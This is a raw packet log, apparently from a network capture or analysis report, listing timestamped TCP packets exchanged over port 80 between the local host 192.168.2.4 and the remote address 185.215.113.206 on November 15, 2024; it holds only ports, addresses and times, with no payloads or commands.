Nov 15, 2024 14:09:27.463274956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.463290930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.463293076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.463308096 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.463318110 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.463331938 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.463335037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.463356972 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.463381052 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465221882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465240955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465260983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465274096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465276957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465293884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465297937 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465310097 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465312004 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465321064 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465328932 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465337992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465344906 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465356112 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465361118 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465378046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.465379000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.465418100 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.471137047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471160889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471178055 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471194029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471210957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471225977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.471227884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471256018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471261024 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.471266031 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471271992 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.471273899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.471309900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.471333981 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.472129107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472147942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472162962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472181082 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472181082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.472196102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.472198009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472215891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472224951 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.472253084 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.472924948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472942114 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472970009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472971916 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.472987890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.472996950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.473006010 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.473018885 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.473031998 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.473031998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.473040104 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.473047972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.473056078 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.473057032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.473073959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.473093987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.475720882 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475728989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475738049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475745916 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475754976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475763083 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475765944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.475770950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475778103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.475800037 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.475831985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477400064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477418900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477435112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477451086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477452040 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477468014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477469921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477480888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477484941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477503061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477507114 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477519035 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477519989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477528095 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477538109 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.477545977 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.477586031 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.481118917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.481175900 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.541649103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.541723013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.543107033 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.543163061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.565705061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.565767050 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.565814018 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.565834045 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.565860987 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.565901041 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.566418886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.566445112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.566461086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.566478014 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.566479921 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.566492081 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.566505909 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.566524029 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.567281961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.567300081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.567327976 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.567333937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.567351103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.567378044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.567404032 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.568368912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.568389893 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.568407059 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.568424940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.568424940 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.568453074 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.568480015 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.569224119 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.569242001 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.569257021 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.569273949 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.569274902 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.569284916 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.569292068 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.569305897 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.569324017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.569336891 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.570235968 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.570255041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.570271015 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.570285082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.570288897 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.570300102 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.570322990 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.570336103 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.570995092 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571012974 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571028948 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571042061 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571053982 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571059942 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571077108 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571082115 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571111917 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571135044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571755886 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571774960 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571793079 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571805000 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571810961 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.571814060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571827888 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.571856976 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.572551966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.572571993 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.572587967 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.572603941 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.572603941 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.572621107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.572621107 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.572643042 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.572674990 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.573319912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.573338032 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.573354006 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.573368073 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.573370934 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.573381901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.573402882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.573419094 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.574271917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.574291945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.574310064 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.574321985 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.574327946 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.574331999 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.574347019 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.574356079 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.574373007 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.574389935 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.575017929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575037003 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575053930 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575066090 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.575072050 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575083017 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.575088978 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575103045 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.575120926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.575134039 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.575931072 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575947046 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575961113 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575978041 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.575993061 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576009035 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576020956 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.576054096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.576761007 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576778889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576793909 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576809883 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576816082 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.576827049 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.576838970 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.576864004 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.577569962 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.577588081 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.577604055 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.577619076 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.577620983 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.577631950 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.577637911 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.577651978 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.577653885 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.577673912 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.577701092 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.578665972 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.578682899 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.578696966 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.578713894 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.578731060 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.579571009 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.579588890 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.579616070 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.579632044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.580240011 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.580250025 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.580256939 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.580260992 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.580285072 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.580318928 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.581197977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.581214905 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.581231117 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.581247091 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.581264973 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.581891060 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.581907988 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.581923008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.581940889 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.581958055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.582520008 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.582537889 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.582552910 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.582568884 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.582577944 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.582597971 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.582627058 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.583564043 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.583580971 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.583596945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.583642960 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.584316969 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.584335089 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.584348917 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.584364891 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.584366083 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.584387064 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.584414959 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.585429907 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.585447073 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.585463047 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.585478067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.585481882 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.585495949 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.585504055 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.585530996 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.586847067 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.586863995 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.586879015 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.586894989 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.586919069 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.586966991 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.587971926 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.587987900 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.588004112 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.588020086 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.588035107 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.588052988 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.588080883 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.589278936 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.589296103 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.589318037 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.589323044 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.589324951 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.589348078 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.589376926 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.590434074 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.590451956 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.590466976 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.590482950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.590497971 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.590512037 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.590539932 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.591068029 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.591084957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.591099977 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.591115952 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.591169119 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.591169119 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.592683077 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592701912 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592739105 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.592760086 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.592901945 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592917919 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592932940 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592948914 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592950106 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.592964888 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.592974901 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.593005896 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.593981028 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.593997955 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594013929 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594028950 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594031096 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.594053030 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.594082117 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.594810963 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594826937 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594841957 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594857931 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594871998 CET	80	49752	185.215.113.206	192.168.2.4
Nov 15, 2024 14:09:27.594892979 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.594918013 CET	49752	80	192.168.2.4	185.215.113.206
Nov 15, 2024 14:09:27.595767975 CET	80	49752	185.215.113.206	192.168.2.4
